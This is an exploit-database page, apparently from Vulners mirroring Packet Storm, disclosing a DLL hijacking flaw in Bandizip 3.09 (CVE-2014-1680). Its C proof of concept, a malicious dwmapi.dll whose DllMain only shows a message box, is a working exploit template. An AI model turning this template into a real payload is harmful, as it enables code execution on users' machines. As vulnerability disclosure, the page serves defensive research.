Lucene search
K

Bandizip 3.09 DLL Hijack

🗓️ 05 Feb 2014 00:00:00Reported by Osanda MalithType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Bandizip 3.09 DLL Hijack Exploit using dwmapi.dl

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-1680
14 Feb 201402:00
cve
Cvelist
CVE-2014-1680
14 Feb 201402:00
cvelist
EUVD
EUVD-2014-1754
7 Oct 202500:30
euvd
NVD
CVE-2014-1680
14 Feb 201413:10
nvd
Prion
Design/Logic Flaw
14 Feb 201413:10
prion
seebug.org
Bandizip不安全库加载漏洞
19 Feb 201400:00
seebug
`/*   
* Exploit Title: Bandizip 3.09 DLL Hijacking Exploit (dwmapi.dll)  
* Date: February 5th 2014  
* Author: Osanda Malith Jayathissa  
* E-Mail: osandajayathissa<at>gmail.com  
* Version: 3.09  
* Vendor Homepage: http://www.bandisoft.com/  
* Tested on: Windows XP SP2 en  
* Vulnerable extensions: All Extensions  
* CVE: CVE-2014-1680  
*/  
  
#include <windows.h>   
  
BOOL WINAPI DllMain (  
HANDLE hinstDLL,  
DWORD fdwReason,  
LPVOID lpvReserved)  
{  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH:  
owned();  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
return TRUE;  
}  
  
int owned() {  
MessageBox(0, "Bandizip DLL Hijacked\nOsanda Malith", "POC", MB_OK);  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2014 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.00055
31